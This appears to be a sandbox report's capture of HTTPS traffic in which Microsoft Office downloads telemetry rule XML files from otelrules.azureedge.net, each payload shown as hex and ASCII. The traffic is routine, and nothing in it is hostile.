                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: ytkvw5Ihy0GEXf73.3Context: 6fe13fc8fc2ec34d<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:10 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:10 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6a 57 36 53 61 70 47 7a 43 55 53 4f 66 5a 32 68 6e 33 64 46 47 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: jW6SapGzCUSOfZ2hn3dFGQ.0Payload parsing failed.


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      1192.168.2.64971013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:12 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:12 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/plain
                                                                                                                                                                                                                                                                                      Content-Length: 218853
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 19 Nov 2024 13:10:03 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DD089B7B2F27B3"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 082f1a68-301e-005d-348c-3ae448000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095412Z-1777c6cb754xlpjshC1TEBv8cc00000009h000000000a5tr
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                      Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                      Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                                                                                                                                                                                      Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                                                                                                                                                                                      Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                                                                                                                                                                                      Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                                                                                                                                                                                      Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                                                                                                                                                                                      Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                                                                                                                                                                                      Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      2192.168.2.64971513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 408
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                                                                                                      x-ms-request-id: e579fe48-a01e-001e-648c-3a49ef000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-185f5d8b95cqnkdjhC1NYCm8w800000009y0000000006g7y
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      3192.168.2.64971313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 2980
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 884d2a23-a01e-00ab-5b8c-3a9106000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-185f5d8b95ctl8xlhC1NYCn94g0000000a3g000000009vur
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      4192.168.2.64971413.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 2160
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 8753231e-501e-008f-038c-3a9054000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-185f5d8b95csd4bwhC1NYCq7dc0000000a2g000000001qve
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      5192.168.2.64971213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:13 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:14 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 450
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                      x-ms-request-id: ac6669be-e01e-003c-668c-3ac70b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095414Z-1777c6cb754gvvgfhC1TEBz4rg00000009eg00000000bvbn
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
